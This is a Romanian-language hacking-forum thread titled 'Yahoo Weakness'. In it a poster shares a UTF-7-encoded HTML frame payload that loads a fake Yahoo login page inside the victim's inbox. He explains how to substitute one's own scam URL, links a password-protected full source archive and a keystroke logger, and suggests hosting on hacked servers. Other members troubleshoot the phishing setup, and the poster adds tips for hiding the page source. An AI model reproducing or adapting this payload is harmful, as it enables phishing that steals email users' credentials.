Jump to content
Guest Nemessis

Yahoo Weakness

By Guest Nemessis, in Exploituri

Recommended Posts

Guest Nemessis

Guest Nemessis

Posted
Posted

Acest script creeaza un frame direct din inboxul victimei pentru a fi redirectionata catre scamul vostru. Este necesar sa aveti pusa sus o pagina de login fara bannere. Inlocuiti linkul de mai jos cu linkul catre site-ul vostru.

<meta http-equiv="Content-Type" content="text/html; charset=UTF-7">

<html>

<style_ html> <frame frameborder=0 src=http://us.f370.mail.yahoo.5u.com/index2.html><frameset>'))">

Reparat de mine folosind un script mai vechi si folosind UTF-7 encoding. Nu il imprastiati pe unde apucati pentru ca veti ramane fara el. Urmeaza exploitul de cookies foarte curand.

Link to comment
Share on other sites
Guest Nemessis

Guest Nemessis

Posted
Posted

This script can create frames in Yahoo inboxes. Send this script to somebody and when the guy is reading the mail he will be redirected automatically to a scam page (your scam page). The best thing is that the url remain the same so this scam looks really good and is more effective. To make this script work for you, change the "src=http://us.f370.mail.yahoo.5u.com/index2.html" line with your fake login url. Works only on IE.

Link to comment
Share on other sites
PsYKid Newbie

PsYKid

Posted
Posted 





The recipient address is unknown

The address you are trying to send to (hipercritic@yahoo.com) is not authorized to receive mail via this gateway. 



Please contact the webmaster of the page that referred you to this link and inform them they will no longer be able to use this function to send mail to [email]hipercritic@yahoo.com[/email]. 



If you feel this error is incorrect and that you should be able to send mail via this gateway, please contact the ISP that referred you to the mailgate service





well nemesis ...ce`am facut rau ?

Link to comment
Share on other sites
Guest Nemessis

Guest Nemessis

Posted
Posted

The recipient address is unknown

The address you are trying to send to (hipercritic@yahoo.com) is not authorized to receive mail via this gateway.

Hostingul nu permite acel form. Try another ;) Nu uita ca nu trebuie sa apara bannere sau pop-up.

Link to comment
Share on other sites
Guest Nemessis

Guest Nemessis

Posted
Posted

Hostingul. Ai urcat pagina pe un server ce nu permite acel form de mailgate. Ca proba poti incerca pe un domeniu de Geocities si vei vedea ca merge (dar nu face treaba cu el pentru ca apar bannere).

Link to comment
Share on other sites
th0r Newbie

th0r

Posted
Posted

I heard somekind like .. Hackers using onKeyDown functions of javascript in order to depress any key stroke .. So they can do something like keylogging on some vulnerable sites .. Do u think that we can do something like that in yahoo??

Because it says that XSS using this kind of scripts can be executed on most of the browser .. Including IE and FireFox .. The only way to avoid this is turned off the Java ..

Thanks PsYKiD .. Hehehe ..

I will try to understand more about romanian >,<

Sorry to disturb ..

Edited :: I tried to sent an email with that code included .. But it seems that it will shows the entire code and nothng happened on yahoo .. Any idea about that??

Thanks.

Th0R

Link to comment
Share on other sites
Guest Nemessis

Guest Nemessis

Posted
Posted

Full source: http://rapidshare.de/files/28553738/YahRed...t_2006.rar.html

Passwd: nemessis

th0r? What tricks? The logger or the yahoo redirect? Both of them works. The logger will show you the keystrokes typed by you in the bottom left corner of your browser (IE only). And the redirect works, just find a good hosting provider (or some hacked webserver) who accept the mailgate form submission for your scam page.

Link to comment
Share on other sites
Sad_Dreamer Newbie

Sad_Dreamer

Posted
Posted

chestia e ca nu tzine...adica omu' deschide mailu' si ce vede? o alta pagina unde sa se logheze..isi da seama ca e phishing :) mai ales daca e unu mai destept...isi da seama si nah..poa' sa dea si eu un view source :) si vede ca e HTML pe cand yahoo e facut un php + ca se vede si mailul :) nu cred ca e cine stie ce faza..ar trebui facuta public :)

Link to comment
Share on other sites
Guest Nemessis

Guest Nemessis

Posted
Posted

Pot face sa apara pagina cu session expired iar apoi sa apara loginul (toate cu url-ul de la yahoo). Asa era inainte dar am pierdut scripturile si mi-a fost lene sa mai fac altele. Plus ca pot da disable la click dreapta si sa criptez sursa in ultimul hal :) .

Link to comment
Share on other sites
nos Newbie

nos

Posted
Posted

ba baieti

1.ori sunt yo prost de nu stiu sa fac

2.ori numai merge metoda

3.ori e de la host

4.cand deschid html pe pagina proprie ma redirectioneaza cand imi trimit mie pe mail nu ma redirectioneaza

5.mereu am deschis cu internet explorer

6.cand deschid p calcu propriu imi apare o daia cu pop-up de blocare oare de la aia sa fie

7.am increcat pe 4 hostin-uri au tyoate functia de mail activa dar nu ma redirectioneaza

8.am incercat si pe altcineva

care e problema uite le pun pe amandoua fisiere sa imi spuneti daca e ceva gresit......

http://rapidshare.ro/download.php?id=0dbbQ...cGxJqH0yXOu8y6R :@ :@

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...